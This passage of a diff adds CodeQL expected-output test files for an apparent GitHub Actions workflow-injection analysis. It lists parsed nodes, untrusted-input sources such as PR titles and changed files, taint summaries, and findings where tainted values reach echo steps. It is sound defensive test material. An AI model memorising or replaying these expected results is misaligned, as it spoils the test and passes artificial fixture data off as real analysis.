.github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | id: sink | +cfgNodes +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +dfNodes +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +exprNodes +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +argumentNodes +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +usesIds +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | source | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | step | +nodeLocations +| .github/workflows/test.yml:1:1:40:53 | on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:19:8:49 | .github/workflows/test.yml@8:19:8:49 | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:19:23:63 | .github/workflows/test.yml@23:19:23:63 | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +scopes +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | +| ahmadnassri/action-changed-files | * | output.json | pull_request_target | PR changed files | +| dorny/paths-filter | * | output.changes | pull_request_target | PR changed files | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | pull_request_target | PR body | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | pull_request_target | PR title | +| jitterbit/get-changed-files | * | output.added | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.added_modified | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.all | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.deleted | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.modified | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.removed | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.renamed | pull_request_target | PR changed files | +| khan/pull-request-comment-trigger | * | output.comment_body | issue_comment | | +| khan/pull-request-comment-trigger | * | output.comment_body | pull_request_comment | | +| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | * | Foo | +| tj-actions/branch-names | * | output.current_branch | pull_request_target | PR current branch | +| tj-actions/branch-names | * | output.head_ref_branch | pull_request_target | PR head branch | +| tj-actions/branch-names | * | output.ref_branch | pull_request_target | Branch tirggering workflow run | +| tj-actions/changed-files | * | output.added_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_changed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.changed_keys | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.copied_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.deleted_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.modified_keys | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.other_changed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.other_deleted_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.other_modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.renamed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.type_changed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.unknown_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.unmerged_files | pull_request_target | PR changed files | +| tj-actions/verify-changed-files | * | output.changed-files | pull_request_target | PR changed files | +| tzkhan/pr-update-action | * | output.headMatch | pull_request_target | | +| xt0rted/slash-command-action | * | output.command-arguments | issue_comment | | +| xt0rted/slash-command-action | * | output.command-arguments | pull_request_comment | | +summaries +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | +| bobheadxi/deployments | * | input.env | output.env | taint | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | +| csexton/release-asset-action | * | input.release-url | output.url | taint | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | +| frabert/replace-string-action | * | input.string | output.replaced | taint | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | +| getsentry/action-release | * | input.version | output.version | taint | +| getsentry/action-release | * | input.version_prefix | output.version | taint | +| github/codeql-action | * | input.output | output.sarif-output | taint | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | +| haya14busa/action-cond | * | input.if_false | output.value | taint | +| haya14busa/action-cond | * | input.if_true | output.value | taint | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | +| jsdaniell/create-json | * | input.json | output.successfully | taint | +| jsdaniell/create-json | * | input.name | output.successfully | taint | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | +| octo-org/summary-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | +| octo-org/this-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | +calls +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | mad9000/actions-find-and-replace-string | +needs +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | diff --git a/ql/src/test/partial.expected b/ql/src/test/partial.expected new file mode 100644 index 000000000000..98aea83de2e5 --- /dev/null +++ b/ql/src/test/partial.expected @@ -0,0 +1,28 @@ +edges +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | +| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | +| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +#select +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | this source | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | diff --git a/ql/src/test/test.expected b/ql/src/test/test.expected new file mode 100644 index 000000000000..5dd2313e8518 --- /dev/null +++ b/ql/src/test/test.expected @@ -0,0 +1,152 @@ +edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | +| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | +| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | +| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | 